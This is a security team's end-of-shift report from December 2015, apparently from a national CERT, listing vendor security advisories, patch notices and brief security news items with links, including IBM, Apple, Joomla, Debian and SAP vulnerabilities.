End-of-Shift report
Timeframe: Freitag 11-12-2015 18:00 − Montag 14-12-2015 18:00
Handler: Stephan Richter
Co-Handler: Alexander Riepl
IBM Security Bulletin
Vulnerability in Apache Commons affects WebSphere Message Broker and IBM Integration Bus (CVE-2015-7450)
http://www.ibm.com/support/docview.wss?uid=swg21972391
***Vulnerability in Apache Commons affects Tivoli Network Manager Transmission Edition (CVE-2015-7450)
http://www.ibm.com/support/docview.wss?uid=swg21971891
***Vulnerability in Apache Commons affects Rational Developer for System z (CVE-2015-7450)
http://www.ibm.com/support/docview.wss?uid=swg21971643
***Vulnerability in the IBM Installation Manager script (CVE-2015-7442)
http://www.ibm.com/support/docview.wss?uid=swg21971295
***Vulnerability in Apache Commons affects Rational Software Architect, Rational Software Architect for WebSphere Software and Rational Software Architect RealTime (CVE-2015-7450)
http://www.ibm.com/support/docview.wss?uid=swg21972753
***Vulnerabilities in OpenSSL affect IBM Rational Application Developer for WebSphere Software (CVE-2015-3193, CVE-2015-3194, CVE-2015-3195, CVE-2015-3196, CVE-2015-1794)
http://www.ibm.com/support/docview.wss?uid=swg21972951
***A security vulnerability has been identified in IBM Maximo Asset Management which could allow an attacker to obtain sensitive information via REST API (CVE-2015-7452)
http://www.ibm.com/support/docview.wss?uid=swg21972463
***IBM Maximo Asset Management is vulnerable to cross-site scripting, caused by improper validation of user-supplied input (CVE-2015-7451)
http://www.ibm.com/support/docview.wss?uid=swg21972423
***IBM Security Network Intrusion Prevention System is affected by krb5 vulnerabilities (CVE-2014-4341, CVE-2013-1418 )
http://www.ibm.com/support/docview.wss?uid=swg21970321
***A vulnerability in OpenSSH affects IBM Security Network Intrusion Prevention System (CVE-2015-5600)
http://www.ibm.com/support/docview.wss?uid=swg21969673
***A vulnerability in net-snmp affects IBM Security Network Intrusion Prevention System (CVE-2014-3565)
http://www.ibm.com/support/docview.wss?uid=swg21972208
***Vulnerabilities in curl affect IBM Security Network Intrusion Prevention System
http://www.ibm.com/support/docview.wss?uid=swg21968978
***A security vulnerability has been identified in IBM Rational ClearQuest (CVE-2015-4996)
http://www.ibm.com/support/docview.wss?uid=swg21972331
***Multiple vulnerabilities in IBM Java Runtime affect IBM Tivoli Provisioning Manager (CVE-2015-2601, CVE-2015-1931, CVE-2015-2625)
http://www.ibm.com/support/docview.wss?uid=swg21972941
***Vulnerabilities in OpenSSL affect IBM Cognos Planning(CVE-2015-1789, CVE-2015-1790, CVE-2015-1792)
http://www.ibm.com/support/docview.wss?uid=swg21971729
Website Malware - Evolution of Pseudo Darkleech
Last March we described a WordPress attack that was responsible for hidden iframe injections that resembled Darkleech injections: declarations of styles with random names and coordinates, iframes with No-IP host names, and random dimensions where the ..
https://blog.sucuri.net/2015/12/evolution-of-pseudo-darkleech.html
iTunes 12.3.2
https://support.apple.com/kb/HT205636
Security Advisory: Apache Groovy vulnerability CVE-2015-3253
The MethodClosure class in runtime/MethodClosure.java in Apache Groovy 1.7.0 through 2.4.3 allows remote attackers to execute arbitrary code or cause a denial of service via a crafted serialized object. (CVE-2015-3253)
https://support.f5.com:443/kb/en-us/solutions/public/k/49/sol49233165.html
Security Update 2015-006 Yosemite
https://support.apple.com/kb/HT205653
OS X El Capitan 10.11.2, Security Update 2015-005 Yosemite, and Security Update 2015-008 Mavericks
https://support.apple.com/kb/HT205637
OS X El Capitan 10.11.1, Security Update 2015-004 Yosemite, and Security Update 2015-007 Mavericks
https://support.apple.com/kb/HT205375
What Signs Are You Missing?
While recently listening to a presentation, I found my attention drawn to a metal water container at the center of the conference room table. Condensation was all around it and without ever having to interact with the container, I found ..
https://isc.sans.edu/diary.html?storyid=20481
Google Bans Symantec Root Certificates
An anonymous reader writes: After in September Google discovered SSL certificates issued in its name by Symantec, and after in October the company discovered over 2,500 ..
http://tech.slashdot.org/story/15/12/12/2255212/google-bans-symantec-root-certificates
DSA-3416 libphp-phpmailer - security update
Takeshi Terada discovered a vulnerability in PHPMailer, a PHP library foremail transfer, used by many CMSs. The library accepted email addressesand SMTP commands containing line breaks, which can be abused by anattacker to inject messages.
https://www.debian.org/security/2015/dsa-3416
Memory-resident modular malware menaces moneymen
Latentbot avoids your HDD - and its been off the radar for two years A stealthy strain of malware resident only in memory has been quietly pwning victims around the world for two years.
www.theregister.co.uk/2015/12/14/latentbot_memory_resident_malware/
Lenovo/CSR: Bluetooth-Treiber installiert Root-Zertifikat
Ein Bluetooth-Treiber für Chips der Firma CSR installiert zwei Root-Zertifikate, mit denen der Besitzer des privaten Schlüssels HTTPS-Verbindungen angreifen könnte. Offenbar handelt es sich um Testzertifikate zur Treibersignierung während der Entwicklung.
http://www.golem.de/news/lenovo-csr-bluetooth-treiber-installiert-root-zertifikat-1512-117996.html
Inside the German cybercriminal underground
Trend Micro investigated on German crime forums and concluded that Germany possesses the most advanced cybercrime ecosystem in the European Union. We have reported several times the news related to various criminal cybercriminal ..
http://securityaffairs.co/wordpress/42802/cyber-crime/german-cybercriminal-underground.html
[20151214] - Core - Remote Code Execution Vulnerability
Browser information are not filtered properly while saving the session values into the database what leads to a Remote Code Execution vulnerability.
https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html
[20151214] - Core - CSRF Hardening
Add additional CSRF hardening in com_templates.
https://developer.joomla.org/security-centre/633-20151214-core-csrf-hardening.html
[20151214] - Core - Directory Traversal
Fails to properly sanitise input data from the XML install file located within the package archive.
https://developer.joomla.org/security-centre/634-20151214-core-directory-traversal.html
Bugtraq: ERPSCAN Research Advisory [ERPSCAN-15-022] SAP NetWeaver 7.4 - XSS
http://www.securityfocus.com/archive/1/537111
Bugtraq: [ERPSCAN-15-021] SAP NetWeaver 7.4 - SQL Injection vulnerability
http://www.securityfocus.com/archive/1/537109
Sicherheitsforscher: Datenleck bei Mackeeper erlaubt freien Zugriff auf Nutzerdaten
Die Datenbank der umstrittetenen Mac-Software Mackeeper sei frei zugänglich, erklärt ein Sicherheitsforscher. Er habe 13 Millionen Datensätze mit Nutzerinformationen ungehindert heruntergeladen.
http://heise.de/-3043720